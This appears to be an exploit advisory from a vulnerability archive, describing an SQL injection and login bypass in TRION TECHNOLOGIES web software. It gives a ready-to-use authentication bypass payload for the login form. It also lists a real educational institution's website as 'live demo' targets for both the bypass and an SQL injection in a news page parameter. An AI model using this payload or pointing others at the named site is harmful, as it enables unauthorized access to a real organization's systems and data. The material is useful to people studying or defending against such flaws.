TRION TECHNOLOGIES SQL Injection | Authentication Bypass

2017.06.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: TRION TECHNOLOGIES - SQL Injection | Authentication Bypass # Google Dork: N/A # Date: 2017-06-19 # Exploit Author: Mersad Security Research # Software Link: - # Version: All Version # Tested on: Kali Liunx # CVE : - -------------------------------------- Exploit Bypass:/login.php http://127.0.0.1/login.php username:'=' 'or' password:'=' 'or' ------------------------------------- Live Demo Bypass: http://www.amccomilla.edu.bd/login.php Live Demo SQL Injection: http://www.amccomilla.edu.bd/news-more.php?newsid=7[SQLi] ------------------------------------- # Discovered By: Sh4dow (BlackPentester@Gmail.Com) # We Are:Mersad (Mersad - Gray Industry) # https://telegram.me/MersadGroup # Mersad@Protonmail.Com # Sh4dow - Cyrus - SOLTAN SILENT - AminStev


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top